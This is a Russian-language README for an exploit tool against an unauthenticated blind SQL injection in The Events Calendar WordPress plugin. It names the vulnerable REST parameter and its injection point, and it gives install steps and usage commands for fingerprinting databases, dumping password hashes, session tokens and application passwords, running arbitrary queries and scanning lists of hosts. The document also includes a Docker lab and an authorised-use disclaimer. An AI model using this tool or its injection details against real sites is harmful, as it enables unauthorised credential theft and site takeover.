
Эксплойт слепой SQL-инъекции для CVE-2026-49772, нацеленный на плагин The Events Calendar для WordPress. Извлекает содержимое базы данных через булевый/временной оракул с многопоточным сканированием, дампом хэшей пользователей и поддержкой пользовательских запросов.
CVE-2026-49772 — это неаутентифицированная слепая SQL-инъекция в плагине WordPress The Events Calendar. Некорректный валидатор параметров REST (validate_callback возвращает замыкание вместо проверки) позволяет параметру order в экспериментальном REST API tec/v1 достигать неэкранированного SQL-предложения ORDER BY:
GET /wp-json/tec/v1/events?orderby=event_date&order=<INJECTION>
... ORDER BY event_date <INJECTION>, wp_posts.post_date DESC ...
Это инъекция только для чтения (нет составных запросов, записи или прямого вывода) — но вся база данных извлекаема через булевый/временной оракул: хеши паролей пользователей, токены сессий, пароли приложений, секретные ключи.
Затронутые версии: The Events Calendar 6.15.12 – 6.16.2 (исправлено в 6.16.3)
Серьёзность: CVSS 3.1 9.3 Критический — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
--check — Неразрушающее обнаружение: пространство имён REST, версия плагина, временное подтверждение--recon — Отпечаток БД: версия, текущий пользователь, база данных, ОС, привилегии, префикс таблиц--users — Дамп wp_users: логины, email, хеши паролей--user-meta — Дамп wp_usermeta: токены сессий, пароли приложений, возможности--get-table — Дамп любой таблицы с автоматическим определением столбцов--query — Извлечение результата любого скалярного SELECTЧистая стандартная библиотека Python 3 — requirements.txt включён для стандартного рабочего процесса, но не устанавливает ничего лишнего.
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help
python3 CVE-2026-49772.py <target> <action> [options]
Выберите ровно одно действие: --check, --recon, --users, --user-meta,
--get-table <TABLE>, --query <SQL>. Запустите --help для всех опций.
python3 CVE-2026-49772.py target.tld --check
python3 CVE-2026-49772.py target.tld --recon
python3 CVE-2026-49772.py target.tld --users
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"
Настройка: --technique boolean|time, --delay, --threads, --rows, --prefix,
--where, -useragent, -timeout. Сканирование нескольких хостов с помощью -l targets.txt.
Автономная лаборатория Docker Compose с уязвимым плагином (включён в сборку, не загружается при запуске) и предварительно заполненными событиями. Смотрите docker/DOCKER.md.
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check
/wp-json/tec/v1/ на WAF / обратном проксиЭтот инструмент предоставляется только в образовательных и исследовательских целях. Используйте его только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение. Создатель не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.